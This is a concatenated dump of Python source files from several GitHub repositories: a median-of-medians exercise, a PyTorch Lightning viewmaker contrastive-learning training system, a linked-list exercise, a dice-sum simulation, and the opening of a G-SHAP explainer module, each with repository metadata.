med_of_med(arr,i):\n\n # lista list 5 elementowych, zawierajaca kolejne elementy wejsciowej tablicy\n lists=[arr[j:j+5] for j in range(0,len(arr),5)] \n \n # tworze liste zawierajaca mediane kazdej z 5-el. list\n medians=[sorted(List)[len(List)//2] for List in lists] \n\n #szukam pivota mediany median w zaleznosci jak dluga jest lista 'medians'\n \n if len(medians) <= 5 :\n pivot=sorted(medians)[len(medians)//2]\n else:\n # rekurencyjnie szukam mediany listy 'medians'\n pivot=med_of_med(medians,len(medians)//2) \n \n\n #podzial na mniejsze i wieksze elementy od pivota\n low=[i for i in arr if ipivot]\n\n x=len(low)\n\n #element x-ty (o indeksie x-1) to pivot, na lewo sa mniejsze, na prawo wieksze, wiec spr po ktore stronie lezy szukany i-ty element\n if ix:\n return med_of_med(high, i-x-1) # na prawo mamy x-k elementow\n else: \n return pivot\n","repo_name":"sy1wi4/ASD-2020","sub_path":"searching/median_of_medians.py","file_name":"median_of_medians.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"pl","doc_type":"code","stars":5,"dataset":"github-code","pt":"99"} +{"seq_id":"30769556853","text":"import os\nimport random\nimport dotmap\nimport numpy as np\nfrom dotmap import DotMap\nfrom collections import OrderedDict\nfrom sklearn.metrics import f1_score\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.utils.data import DataLoader\nimport torchvision\n\nfrom src.datasets import datasets\nfrom src.models import resnet_small, resnet\nfrom src.models.transfer import LogisticRegression\nfrom src.objectives.memory_bank import MemoryBank\nfrom src.objectives.adversarial import AdversarialSimCLRLoss, AdversarialNCELoss\nfrom src.objectives.infonce import NoiseConstrastiveEstimation\nfrom src.objectives.simclr import SimCLRObjective\nfrom src.utils import utils\n\nfrom src.models import viewmaker\n\nimport torch_dct as dct\nimport pytorch_lightning as pl\nimport wandb\n\n\ndef create_dataloader(dataset, config, batch_size, shuffle=True, drop_last=True):\n loader = DataLoader(\n dataset, \n batch_size=batch_size,\n shuffle=shuffle, \n pin_memory=True,\n drop_last=drop_last,\n num_workers=config.data_loader_workers,\n )\n return loader\n\n\nclass PretrainViewMakerSystem(pl.LightningModule):\n '''Pytorch Lightning System for self-supervised pretraining \n with adversarially generated views.\n '''\n\n def __init__(self, config):\n super().__init__()\n self.config = config\n self.batch_size = config.optim_params.batch_size\n self.loss_name = self.config.loss_params.objective\n self.t = self.config.loss_params.t\n\n self.train_dataset, self.val_dataset = datasets.get_image_datasets(\n config.data_params.dataset,\n config.data_params.default_augmentations or 'none',\n )\n # Used for computing knn validation accuracy\n train_labels = self.train_dataset.dataset.targets\n self.train_ordered_labels = np.array(train_labels)\n\n self.model = self.create_encoder()\n self.viewmaker = self.create_viewmaker()\n \n # Used for computing knn validation accuracy.\n self.memory_bank = MemoryBank(\n len(self.train_dataset),\n self.config.model_params.out_dim,\n )\n\n def view(self, imgs):\n if 'Expert' in self.config.system:\n raise RuntimeError('Cannot call self.view() with Expert system')\n views = self.viewmaker(imgs)\n views = self.normalize(views)\n return views\n\n def create_encoder(self):\n '''Create the encoder model.'''\n if self.config.model_params.resnet_small:\n # ResNet variant for smaller inputs (e.g. CIFAR-10).\n encoder_model = resnet_small.ResNet18(self.config.model_params.out_dim)\n else:\n resnet_class = getattr(\n torchvision.models, \n self.config.model_params.resnet_version,\n )\n encoder_model = resnet_class(\n pretrained=False,\n num_classes=self.config.model_params.out_dim,\n )\n if self.config.model_params.projection_head:\n mlp_dim = encoder_model.fc.weight.size(1)\n encoder_model.fc = nn.Sequential(\n nn.Linear(mlp_dim, mlp_dim),\n nn.ReLU(),\n encoder_model.fc,\n )\n return encoder_model\n\n def create_viewmaker(self):\n view_model = viewmaker.Viewmaker(\n num_channels=self.train_dataset.NUM_CHANNELS,\n distortion_budget=self.config.model_params.view_bound_magnitude,\n activation=self.config.model_params.generator_activation or 'relu',\n clamp=self.config.model_params.clamp_views,\n frequency_domain=self.config.model_params.spectral or False,\n downsample_to=self.config.model_params.viewmaker_downsample or False,\n num_res_blocks=self.config.model_params.num_res_blocks or 5,\n )\n return view_model\n\n def noise(self, batch_size, device):\n shape = (batch_size, self.config.model_params.noise_dim)\n # Center noise at 0 then project to unit sphere.\n noise = utils.l2_normalize(torch.rand(shape, device=device) - 0.5)\n return noise\n \n def get_repr(self, img):\n '''Get the representation for a given image.'''\n if 'Expert' not in self.config.system:\n # The Expert system datasets are normalized already.\n img = self.normalize(img)\n return self.model(img)\n \n def normalize(self, imgs):\n # These numbers were computed using compute_image_dset_stats.py\n if 'cifar' in self.config.data_params.dataset:\n mean = torch.tensor([0.491, 0.482, 0.446], device=imgs.device)\n std = torch.tensor([0.247, 0.243, 0.261], device=imgs.device)\n else:\n raise ValueError(f'Dataset normalizer for {self.config.data_params.dataset} not implemented')\n imgs = (imgs - mean[None, :, None, None]) / std[None, :, None, None]\n return imgs\n\n def forward(self, batch, train=True):\n indices, img, img2, neg_img, _, = batch\n if self.loss_name == 'AdversarialNCELoss':\n view1 = self.view(img)\n view1_embs = self.model(view1)\n emb_dict = {\n 'indices': indices,\n 'view1_embs': view1_embs,\n }\n elif self.loss_name == 'AdversarialSimCLRLoss':\n if self.config.model_params.double_viewmaker:\n view1, view2 = self.view(img)\n else:\n view1 = self.view(img)\n view2 = self.view(img2)\n emb_dict = {\n 'indices': indices,\n 'view1_embs': self.model(view1),\n 'view2_embs': self.model(view2),\n }\n else:\n raise ValueError(f'Unimplemented loss_name {self.loss_name}.')\n \n if self.global_step % 200 == 0:\n # Log some example views. \n views_to_log = view1.permute(0,2,3,1).detach().cpu().numpy()[:10]\n wandb.log({\"examples\": [wandb.Image(view, caption=f\"Epoch: {self.current_epoch}, Step {self.global_step}, Train {train}\") for view in views_to_log]})\n\n return emb_dict\n\n def get_losses_for_batch(self, emb_dict, train=True):\n if self.loss_name == 'AdversarialSimCLRLoss':\n view_maker_loss_weight = self.config.loss_params.view_maker_loss_weight\n loss_function = AdversarialSimCLRLoss(\n embs1=emb_dict['view1_embs'],\n embs2=emb_dict['view2_embs'],\n t=self.t,\n view_maker_loss_weight=view_maker_loss_weight\n )\n encoder_loss, view_maker_loss = loss_function.get_loss()\n img_embs = emb_dict['view1_embs'] \n elif self.loss_name == 'AdversarialNCELoss':\n view_maker_loss_weight = self.config.loss_params.view_maker_loss_weight\n loss_function = AdversarialNCELoss(\n emb_dict['indices'],\n emb_dict['view1_embs'],\n self.memory_bank,\n k=self.config.loss_params.k,\n t=self.t,\n m=self.config.loss_params.m,\n view_maker_loss_weight=view_maker_loss_weight\n )\n encoder_loss, view_maker_loss = loss_function.get_loss()\n img_embs = emb_dict['view1_embs'] \n else:\n raise Exception(f'Objective {self.loss_name} is not supported.') \n \n # Update memory bank.\n if train:\n with torch.no_grad():\n if self.loss_name == 'AdversarialNCELoss':\n new_data_memory = loss_function.updated_new_data_memory()\n self.memory_bank.update(emb_dict['indices'], new_data_memory)\n else:\n new_data_memory = utils.l2_normalize(img_embs, dim=1)\n self.memory_bank.update(emb_dict['indices'], new_data_memory)\n\n return encoder_loss, view_maker_loss\n\n def get_nearest_neighbor_label(self, img_embs, labels):\n '''\n Used for online kNN classifier.\n For each image in validation, find the nearest image in the \n training dataset using the memory bank. Assume its label as\n the predicted label.\n '''\n batch_size = img_embs.size(0)\n all_dps = self.memory_bank.get_all_dot_products(img_embs)\n _, neighbor_idxs = torch.topk(all_dps, k=1, sorted=False, dim=1)\n neighbor_idxs = neighbor_idxs.squeeze(1)\n neighbor_idxs = neighbor_idxs.cpu().numpy()\n\n neighbor_labels = self.train_ordered_labels[neighbor_idxs]\n neighbor_labels = torch.from_numpy(neighbor_labels).long()\n\n num_correct = torch.sum(neighbor_labels.cpu() == labels.cpu()).item()\n return num_correct, batch_size\n\n def training_step(self, batch, batch_idx, optimizer_idx):\n emb_dict = self.forward(batch)\n emb_dict['optimizer_idx'] = torch.tensor(optimizer_idx, device=self.device)\n return emb_dict\n \n def training_step_end(self, emb_dict):\n encoder_loss, view_maker_loss = self.get_losses_for_batch(emb_dict, train=True)\n\n # Handle Tensor (dp) and int (ddp) cases\n if emb_dict['optimizer_idx'].__class__ == int or emb_dict['optimizer_idx'].dim() == 0:\n optimizer_idx = emb_dict['optimizer_idx'] \n else:\n optimizer_idx = emb_dict['optimizer_idx'][0]\n if optimizer_idx == 0:\n metrics = {\n 'encoder_loss': encoder_loss, 'temperature': self.t\n }\n return {'loss': encoder_loss, 'log': metrics}\n else:\n metrics = {\n 'view_maker_loss': view_maker_loss,\n }\n return {'loss': view_maker_loss, 'log': metrics}\n\n def validation_step(self, batch, batch_idx):\n emb_dict = self.forward(batch, train=False)\n if 'img_embs' in emb_dict:\n img_embs = emb_dict['img_embs']\n else:\n _, img, _, _, _ = batch\n img_embs = self.get_repr(img) # Need encoding of image without augmentations (only normalization).\n labels = batch[-1]\n encoder_loss, view_maker_loss = self.get_losses_for_batch(emb_dict, train=False)\n\n num_correct, batch_size = self.get_nearest_neighbor_label(img_embs, labels)\n output = OrderedDict({\n 'val_loss': encoder_loss + view_maker_loss,\n 'val_encoder_loss': encoder_loss,\n 'val_view_maker_loss': view_maker_loss,\n 'val_num_correct': torch.tensor(num_correct, dtype=float, device=self.device),\n 'val_num_total': torch.tensor(batch_size, dtype=float, device=self.device),\n })\n\n return output\n\n def validation_epoch_end(self, outputs):\n metrics = {}\n for key in outputs[0].keys():\n try:\n metrics[key] = torch.stack([elem[key] for elem in outputs]).mean()\n except:\n pass\n\n num_correct = torch.stack([out['val_num_correct'] for out in outputs]).sum()\n num_total = torch.stack([out['val_num_total'] for out in outputs]).sum()\n val_acc = num_correct / float(num_total)\n metrics['val_acc'] = val_acc\n progress_bar = {'acc': val_acc}\n return {'val_loss': metrics['val_loss'], \n 'log': metrics, \n 'val_acc': val_acc, \n 'progress_bar': progress_bar}\n\n def optimizer_step(self, current_epoch, batch_nb, optimizer, optimizer_idx, \n second_order_closure=None, on_tpu=False, using_native_amp=False, using_lbfgs=False):\n if not self.config.optim_params.viewmaker_freeze_epoch:\n super().optimizer_step(current_epoch, batch_nb, optimizer, optimizer_idx)\n return\n\n if optimizer_idx == 0:\n optimizer.step()\n optimizer.zero_grad()\n elif current_epoch < self.config.optim_params.viewmaker_freeze_epoch:\n # Optionally freeze the viewmaker at a certain pretraining epoch.\n optimizer.step()\n optimizer.zero_grad()\n\n def configure_optimizers(self):\n # Optimize temperature with encoder.\n if type(self.t) == float or type(self.t) == int:\n encoder_params = self.model.parameters()\n else:\n encoder_params = list(self.model.parameters()) + [self.t]\n\n encoder_optim = torch.optim.SGD(\n encoder_params,\n lr=self.config.optim_params.learning_rate,\n momentum=self.config.optim_params.momentum,\n weight_decay=self.config.optim_params.weight_decay,\n )\n view_optim_name = self.config.optim_params.viewmaker_optim\n view_parameters = self.viewmaker.parameters()\n if view_optim_name == 'adam':\n view_optim = torch.optim.Adam(\n view_parameters, lr=self.config.optim_params.viewmaker_learning_rate or 0.001)\n elif not view_optim_name or view_optim_name == 'sgd':\n view_optim = torch.optim.SGD(\n view_parameters,\n lr=self.config.optim_params.viewmaker_learning_rate or self.config.optim_params.learning_rate,\n momentum=self.config.optim_params.momentum,\n weight_decay=self.config.optim_params.weight_decay,\n )\n else:\n raise ValueError(f'Optimizer {view_optim_name} not implemented')\n \n return [encoder_optim, view_optim], []\n\n def train_dataloader(self):\n return create_dataloader(self.train_dataset, self.config, self.batch_size)\n\n def val_dataloader(self):\n return create_dataloader(self.val_dataset, self.config, self.batch_size, \n shuffle=False, drop_last=False)\n\n\nclass PretrainExpertSystem(PretrainViewMakerSystem):\n '''Pytorch Lightning System for self-supervised pretraining \n with expert image views as described in Instance Discrimination \n or SimCLR.\n '''\n\n def __init__(self, config):\n super(PretrainViewMakerSystem, self).__init__()\n self.config = config\n self.batch_size = config.optim_params.batch_size\n self.loss_name = self.config.loss_params.name\n self.t = self.config.loss_params.t\n\n default_augmentations = self.config.data_params.default_augmentations\n # DotMap is the default argument when a config argument is missing\n if default_augmentations == DotMap():\n default_augmentations = 'all'\n self.train_dataset, self.val_dataset = datasets.get_image_datasets(\n config.data_params.dataset,\n default_augmentations=default_augmentations,\n )\n train_labels = self.train_dataset.dataset.targets\n self.train_ordered_labels = np.array(train_labels)\n self.model = self.create_encoder()\n self.memory_bank = MemoryBank(\n len(self.train_dataset), \n self.config.model_params.out_dim, \n )\n\n def forward(self, img):\n return self.model(img)\n\n def get_losses_for_batch(self, emb_dict, train=True):\n if self.loss_name == 'nce':\n loss_fn = NoiseConstrastiveEstimation(emb_dict['indices'], emb_dict['img_embs_1'], self.memory_bank,\n k=self.config.loss_params.k,\n t=self.t,\n m=self.config.loss_params.m)\n loss = loss_fn.get_loss()\n elif self.loss_name == 'simclr':\n if 'img_embs_2' not in emb_dict:\n raise ValueError(f'img_embs_2 is required for SimCLR loss')\n loss_fn = SimCLRObjective(emb_dict['img_embs_1'], emb_dict['img_embs_2'], t=self.t)\n loss = loss_fn.get_loss()\n else:\n raise Exception(f'Objective {self.loss_name} is not supported.')\n\n if train:\n with torch.no_grad():\n if self.loss_name == 'nce':\n new_data_memory = loss_fn.updated_new_data_memory()\n self.memory_bank.update(emb_dict['indices'], new_data_memory)\n elif 'simclr' in self.loss_name:\n outputs_avg = (utils.l2_normalize(emb_dict['img_embs_1'], dim=1) + \n utils.l2_normalize(emb_dict['img_embs_2'], dim=1)) / 2.\n indices = emb_dict['indices']\n self.memory_bank.update(indices, outputs_avg)\n else:\n raise Exception(f'Objective {self.loss_name} is not supported.')\n\n return loss\n\n def configure_optimizers(self):\n encoder_params = self.model.parameters()\n\n if self.config.optim_params.adam:\n optim = torch.optim.AdamW(encoder_params)\n else:\n optim = torch.optim.SGD(\n encoder_params,\n lr=self.config.optim_params.learning_rate,\n momentum=self.config.optim_params.momentum,\n weight_decay=self.config.optim_params.weight_decay,\n )\n return [optim], []\n\n def training_step(self, batch, batch_idx):\n emb_dict = {}\n indices, img, img2, neg_img, labels, = batch\n if self.loss_name == 'nce':\n emb_dict['img_embs_1'] = self.forward(img)\n elif 'simclr' in self.loss_name:\n emb_dict['img_embs_1'] = self.forward(img)\n emb_dict['img_embs_2'] = self.forward(img2)\n\n emb_dict['indices'] = indices\n emb_dict['labels'] = labels\n return emb_dict\n\n def training_step_end(self, emb_dict):\n loss = self.get_losses_for_batch(emb_dict, train=True)\n metrics = {'loss': loss, 'temperature': self.t}\n return {'loss': loss, 'log': metrics}\n \n def validation_step(self, batch, batch_idx):\n emb_dict = {}\n indices, img, img2, neg_img, labels, = batch\n if self.loss_name == 'nce':\n emb_dict['img_embs_1'] = self.forward(img)\n elif 'simclr' in self.loss_name:\n emb_dict['img_embs_1'] = self.forward(img)\n emb_dict['img_embs_2'] = self.forward(img2)\n\n emb_dict['indices'] = indices\n emb_dict['labels'] = labels\n img_embs = emb_dict['img_embs_1']\n \n loss = self.get_losses_for_batch(emb_dict, train=False)\n\n num_correct, batch_size = self.get_nearest_neighbor_label(img_embs, labels)\n output = OrderedDict({\n 'val_loss': loss,\n 'val_num_correct': torch.tensor(num_correct, dtype=float, device=self.device),\n 'val_num_total': torch.tensor(batch_size, dtype=float, device=self.device),\n })\n return output\n\n\nclass TransferViewMakerSystem(pl.LightningModule):\n '''Pytorch Lightning System for linear evaluation of self-supervised \n pretraining with adversarially generated views.\n '''\n\n def __init__(self, config):\n super().__init__()\n self.config = config\n self.batch_size = config.optim_params.batch_size\n self.encoder, self.viewmaker, self.system, self.pretrain_config = self.load_pretrained_model()\n resnet = self.pretrain_config.model_params.resnet_version\n \n if resnet == 'resnet18':\n if self.config.model_params.use_prepool:\n if self.pretrain_config.model_params.resnet_small:\n num_features = 512 * 4 * 4\n else:\n num_features = 512 * 7 * 7\n else:\n num_features = 512\n else:\n raise Exception(f'resnet {resnet} not supported.')\n self.train_dataset, self.val_dataset = datasets.get_image_datasets(\n config.data_params.dataset,\n default_augmentations=self.pretrain_config.data_params.default_augmentations or False,\n )\n if not self.pretrain_config.model_params.resnet_small:\n self.encoder = nn.Sequential(*list(self.encoder.children())[:-1]) # keep pooling layer\n\n self.encoder = self.encoder.eval()\n self.viewmaker = self.viewmaker.eval()\n # linear evaluation freezes pretrained weights\n utils.frozen_params(self.encoder)\n utils.frozen_params(self.viewmaker)\n\n self.num_features = num_features\n self.model = self.create_model()\n\n def load_pretrained_model(self):\n base_dir = self.config.pretrain_model.exp_dir\n checkpoint_name = self.config.pretrain_model.checkpoint_name\n\n config_path = os.path.join(base_dir, 'config.json')\n config_json = utils.load_json(config_path)\n config = DotMap(config_json)\n \n if self.config.model_params.resnet_small:\n config.model_params.resnet_small = self.config.model_params.resnet_small\n\n SystemClass = globals()[config.system]\n system = SystemClass(config)\n checkpoint_file = os.path.join(base_dir, 'checkpoints', checkpoint_name)\n checkpoint = torch.load(checkpoint_file, map_location=self.device)\n system.load_state_dict(checkpoint['state_dict'], strict=False)\n\n encoder = system.model.eval()\n viewmaker = system.viewmaker.eval()\n\n return encoder, viewmaker, system, system.config\n\n def create_model(self):\n num_class = self.train_dataset.NUM_CLASSES\n model = LogisticRegression(self.num_features, num_class)\n return model\n\n def noise(self, batch_size):\n shape = (batch_size, self.pretrain_config.model_params.noise_dim)\n # Center noise at 0 then project to unit sphere.\n noise = utils.l2_normalize(torch.rand(shape) - 0.5)\n return noise\n\n def forward(self, img, valid=False):\n batch_size = img.size(0)\n if self.pretrain_config.data_params.spectral_domain:\n img = self.system.normalize(img)\n img = dct.dct_2d(img)\n img = (img - img.mean()) / img.std()\n if not valid and not self.config.optim_params.no_views: \n img = self.viewmaker(img)\n if type(img) == tuple:\n idx = random.randint(0, 1)\n img = img[idx]\n if 'Expert' not in self.pretrain_config.system and not self.pretrain_config.data_params.spectral_domain:\n img = self.system.normalize(img)\n if self.pretrain_config.model_params.resnet_small:\n if self.config.model_params.use_prepool:\n embs = self.encoder(img, layer=5)\n else:\n embs = self.encoder(img, layer=6)\n else:\n embs = self.encoder(img)\n return self.model(embs.view(batch_size, -1))\n\n def get_losses_for_batch(self, batch, valid=False):\n _, img, _, _, label = batch\n logits = self.forward(img, valid)\n if self.train_dataset.MULTI_LABEL:\n return F.binary_cross_entropy(torch.sigmoid(logits).view(-1), \n label.view(-1).float())\n else:\n return F.cross_entropy(logits, label)\n\n def get_accuracies_for_batch(self, batch, valid=False):\n _, img, _, _, label = batch\n batch_size = img.size(0)\n logits = self.forward(img, valid)\n if self.train_dataset.MULTI_LABEL:\n preds = torch.round(torch.sigmoid(logits))\n preds = preds.long().cpu()\n num_correct = torch.sum(preds.cpu() == label.cpu(), dim=0)\n num_correct = num_correct.detach().cpu().numpy()\n num_total = batch_size\n return num_correct, num_total, preds, label.cpu()\n else:\n preds = torch.argmax(F.log_softmax(logits, dim=1), dim=1)\n preds = preds.long().cpu()\n num_correct = torch.sum(preds == label.long().cpu()).item()\n num_total = batch_size\n return num_correct, num_total\n\n def training_step(self, batch, batch_idx):\n loss = self.get_losses_for_batch(batch)\n with torch.no_grad():\n if self.train_dataset.MULTI_LABEL:\n num_correct, num_total, _, _ = self.get_accuracies_for_batch(batch)\n num_correct = num_correct.mean()\n else:\n num_correct, num_total = self.get_accuracies_for_batch(batch)\n metrics = {\n 'train_loss': loss,\n 'train_num_correct': torch.tensor(num_correct, dtype=float, device=self.device),\n 'train_num_total': torch.tensor(num_total, dtype=float, device=self.device),\n 'train_acc': torch.tensor(num_correct / float(num_total), dtype=float, device=self.device)\n }\n return {'loss': loss, 'log': metrics}\n\n def validation_step(self, batch, batch_idx):\n loss = self.get_losses_for_batch(batch, valid=True)\n if self.train_dataset.MULTI_LABEL: # regardless if binary or not\n num_correct, num_total, val_preds, val_labels = \\\n self.get_accuracies_for_batch(batch, valid=True)\n return OrderedDict({\n 'val_loss': loss,\n 'val_num_correct': torch.tensor(num_correct, dtype=float, device=self.device),\n 'val_num_total': torch.tensor(num_total, dtype=float, device=self.device),\n 'val_acc': torch.tensor(num_correct / float(num_total), dtype=float, device=self.device),\n 'val_pred_labels': val_preds.float(),\n 'val_true_labels': val_labels.float(),\n })\n else:\n num_correct, num_total = self.get_accuracies_for_batch(batch, valid=True)\n return OrderedDict({\n 'val_loss': loss,\n 'val_num_correct': torch.tensor(num_correct, dtype=float, device=self.device),\n 'val_num_total': torch.tensor(num_total, dtype=float, device=self.device),\n 'val_acc': torch.tensor(num_correct / float(num_total), dtype=float, device=self.device),\n })\n\n def validation_epoch_end(self, outputs):\n metrics = {}\n for key in outputs[0].keys():\n try:\n metrics[key] = torch.tensor([elem[key] for elem in outputs]).float().mean()\n except:\n pass\n \n if self.train_dataset.MULTI_LABEL:\n num_correct = torch.stack([out['val_num_correct'] for out in outputs], dim=1).sum(1)\n num_total = torch.stack([out['val_num_total'] for out in outputs]).sum()\n val_acc = num_correct / float(num_total)\n metrics['val_acc'] = val_acc.mean()\n progress_bar = {'acc': val_acc.mean()}\n num_class = self.train_dataset.NUM_CLASSES\n for c in range(num_class):\n val_acc_c = num_correct[c] / float(num_total)\n metrics[f'val_acc_feat{c}'] = val_acc_c\n val_pred_labels = torch.cat([out['val_pred_labels'] for out in outputs], dim=0).numpy()\n val_true_labels = torch.cat([out['val_true_labels'] for out in outputs], dim=0).numpy()\n \n val_f1 = 0\n for c in range(num_class):\n val_f1_c = f1_score(val_true_labels[:, c], val_pred_labels[:, c])\n metrics[f'val_f1_feat{c}'] = val_f1_c\n val_f1 = val_f1 + val_f1_c\n val_f1 = val_f1 / float(num_class)\n metrics['val_f1'] = val_f1\n progress_bar['f1'] = val_f1\n return {'val_loss': metrics['val_loss'], \n 'log': metrics,\n 'val_acc': val_acc, \n 'val_f1': val_f1,\n 'progress_bar': progress_bar}\n else:\n num_correct = sum([out['val_num_correct'] for out in outputs])\n num_total = sum([out['val_num_total'] for out in outputs])\n val_acc = num_correct / float(num_total)\n metrics['val_acc'] = val_acc\n progress_bar = {'acc': val_acc}\n return {'val_loss': metrics['val_loss'], \n 'log': metrics, \n 'val_acc': val_acc,\n 'progress_bar': progress_bar}\n\n def configure_optimizers(self):\n params_iterator = self.model.parameters()\n if self.config.optim_params == 'adam':\n optim = torch.optim.Adam(params_iterator)\n else:\n optim = torch.optim.SGD(\n params_iterator,\n lr=self.config.optim_params.learning_rate,\n momentum=self.config.optim_params.momentum,\n weight_decay=self.config.optim_params.weight_decay,\n )\n return [optim], []\n\n def train_dataloader(self):\n return create_dataloader(self.train_dataset, self.config, self.batch_size)\n\n def val_dataloader(self):\n return create_dataloader(self.val_dataset, self.config, self.batch_size, \n shuffle=False, drop_last=False)\n\n\nclass TransferExpertSystem(TransferViewMakerSystem):\n\n def __init__(self, config):\n super(TransferViewMakerSystem, self).__init__()\n self.config = config\n self.batch_size = config.optim_params.batch_size\n \n self.encoder, self.pretrain_config = self.load_pretrained_model()\n resnet = self.pretrain_config.model_params.resnet_version\n if resnet == 'resnet18':\n if self.config.model_params.use_prepool:\n if self.pretrain_config.model_params.resnet_small:\n num_features = 512 * 4 * 4\n else:\n num_features = 512 * 7 * 7\n else:\n num_features = 512\n else:\n raise Exception(f'resnet {resnet} not supported.')\n\n if not self.pretrain_config.model_params.resnet_small:\n self.encoder = nn.Sequential(*list(self.encoder.children())[:-1]) # keep pooling layer\n \n # Freeze encoder for linear evaluation.\n self.encoder = self.encoder.eval()\n utils.frozen_params(self.encoder)\n\n default_augmentations = self.pretrain_config.data_params.default_augmentations\n if self.config.data_params.force_default_views or default_augmentations == DotMap():\n default_augmentations = 'all'\n self.train_dataset, self.val_dataset = datasets.get_image_datasets(\n config.data_params.dataset,\n default_augmentations=default_augmentations,\n )\n self.num_features = num_features\n self.model = self.create_model()\n\n def load_pretrained_model(self):\n base_dir = self.config.pretrain_model.exp_dir\n checkpoint_name = self.config.pretrain_model.checkpoint_name\n\n config_path = os.path.join(base_dir, 'config.json')\n config_json = utils.load_json(config_path)\n config = DotMap(config_json)\n\n if self.config.model_params.resnet_small:\n config.model_params.resnet_small = self.config.model_params.resnet_small\n\n SystemClass = globals()[config.system]\n system = SystemClass(config)\n checkpoint_file = os.path.join(base_dir, 'checkpoints', checkpoint_name)\n checkpoint = torch.load(checkpoint_file, map_location=self.device)\n system.load_state_dict(checkpoint['state_dict'], strict=False)\n\n encoder = system.model.eval()\n return encoder, config\n\n def forward(self, img, unused_valid=None):\n del unused_valid\n batch_size = img.size(0)\n if self.pretrain_config.model_params.resnet_small:\n if self.config.model_params.use_prepool:\n embs = self.encoder(img, layer=5)\n else:\n embs = self.encoder(img, layer=6)\n else:\n embs = self.encoder(img)\n return self.model(embs.view(batch_size, -1))\n","repo_name":"alextamkin/viewmaker","sub_path":"src/systems/image_systems.py","file_name":"image_systems.py","file_ext":"py","file_size_in_byte":31597,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"99"} +{"seq_id":"13447199680","text":"class Node:\n def __init__(self,val,next):\n self.val = val\n self.next = None\n\n\nclass Solution:\n def FindKthToTail(self, head, k):\n front = head\n last = head\n\n for i in range(k):\n if front == None:\n return\n elif front == None and i == k:\n return head\n front = front.next\n\n\n while front.next != None:\n front = front.next\n last = last.next\n\n\n return last.next\n\n\n\nif __name__ == \"__main__\":\n solution = Solution()\n\n node3 = Node(3, None)\n node2 = Node(2,node3)\n node1 = Node(1, node2)\n solution.FindKthToTail(node1,1)\n\n\n\n\n\"\"\"\n\n网上思路:\n代码思路如下:两个指针,先让第一个指针和第二个指针都指向头结点,\n然后再让第一个指正走(k-1)步,到达第k个节点。然后两个指针同时往后移动,\n当第一个结点到达末尾的时候,第二个结点所在位置就是倒数第k个节点了。。\n0 k len-k len\n len-k k len\n\"\"\"","repo_name":"Nexnull/Leetcoding","sub_path":"leetcode/Array/two pointers/19.链表中倒数第k个结点.py","file_name":"19.链表中倒数第k个结点.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"11008709252","text":"#Wrtie an application to simulate the rolling of two dice. The app should use an object of class Random once to roll the first die \n#and again to roll the second die. The sum of the two values should then be caluculated.\n#Each die can show an integer value from 1 to 6, so the sum of the values will vary from 2 to 12, \n#with 7 being the most frequent sum and 2 and 12 being the least frequent sums. \n#The Figure shows the 36 possible combinations of the two dice. Your app should roll the dice 36000 times.\n#Use a one dimensional array ti keep trck of the number of times each possible sum appears. \n#Display the result in a tabular format. determine whether the totals are reasonable \n#(e.g., there are six ways to roll a 7, so approximately one-sixth of the rolls should be 7).\n\n# 1 2 3 4 5 6\n# 1 2 3 4 5 6 7\n# 2 3 4 5 6 7 8\n# 3 4 5 6 7 8 9\n# 4 5 6 7 8 9 10\n# 5 6 7 8 9 10 11\n# 6 7 8 9 10 11 12\n\n#Hints:\n#1-Keep track of how many times each total(2 through 12) occurs. This total is used to calculate the percentage of the time that each total occurs.\n#2-Define a loop that iterates 36,000 times. during each iteration, roll the dice, \n#calculate the total and update the count for the particular total in the array.\n#3-create an array large enough that you can use the sum of the dice as the index into the array.\n#4-Your output should appear as follows:\n# sum frequency percentage\n# 2 1027 2.85\n# 3 2030 5.64\n# 4 2931 8.14\n# 5 3984 11.07\n# 6 5035 13.99\n# 7 5996 16.66\n# 8 4992 13.87\n# 9 4047 11.24\n# 10 2961 8.23\n# 11 1984 5.51\n# 12 1013 2.81\n\n\nimport random\n\ncounter=0\nfrequency = {2:0,3:0,4:0,5:0,6:0,7:0,8:0,9:0,10:0,11:0,12:0}\npercentage = {}\ntotal_frequency=0\ntotal_pecentage=0\n\n#find frequency of occurange for each sum of dice\nwhile counter < 3600:\n\tdice_1=random.randrange(1,7,1)\n\tdice_2=random.randrange(1,7,1)\n\tsum = dice_1 + dice_2\n\n\tif sum in frequency:\n\t\tfrequency[sum] = frequency[sum]+ 1\n\telse:\n\t frequency[sum] = 1\n\tcounter+=1\n\n#find percenatage of occurrance for each frequency\nfor i in frequency:\n\tcaluclate_percentage = (frequency[i]/3600)*100\n\tformated_percentage = round(caluclate_percentage,3)\n\tpercentage[i] = formated_percentage\n\n\n#print result\n#print header\nprint(\"sum \"+ \" frequency \" + \" percentage \")\nfor i in range(2,13):\n\tprint(\" \" + str(i) + \" \"+ str(frequency[i]) + \" \" + str(percentage[i]))\n\ttotal_frequency = total_frequency + frequency[i]\n\ttotal_pecentage = total_pecentage + percentage[i]\n#print totals \nprint(\"total \", str(total_frequency) + \" \" + str(total_pecentage)) \n\n\n","repo_name":"moast/python_awesome_scripts","sub_path":"Roll_Dice_Sum.py","file_name":"Roll_Dice_Sum.py","file_ext":"py","file_size_in_byte":2828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"74293116485","text":"\"\"\"# Kernel Explainer\"\"\"\n\nfrom gshap.utils import get_columns, get_data\n\nfrom random import choices, shuffle\nimport numpy as np\nimport pandas as pd\n\n\nclass KernelExplainer():\n \"\"\"\n The Kernel Explainer is a model-agnostic method of approximating G-SHAP \n values.\n\n Parameters\n ----------\n model : callable\n Callable which takes a (# observations, # features) matrix and returns\n an output which will be fed into `g`. For ordinary SHAP, the model \n returns a (# observations, # targets) output vector.\n \n data : numpy.array or pandas.DataFrame or pandas.Series\n Background dataset from which values are randomly sampled to simulate \n absent features.\n\n g : callable, default=lambda x: x.mean()\n Callable which takes the `model` output and returns a scalar. Defaults\n to the mean of the output, which is the classical SHAP value.\n\n Attributes\n ----------\n model : callable\n Set from the `model` parameter.\n\n data : numpy.array\n Set from the `data` parameter. If `data` is a `pandas` object, it is \n automatically converted to a `numpy.array`.\n\n g : callable\n Set from the `g` parameter.\n\n Examples\n --------\n This example shows how to compute classical SHAP values.\n ```python\n import gshap\n \n from 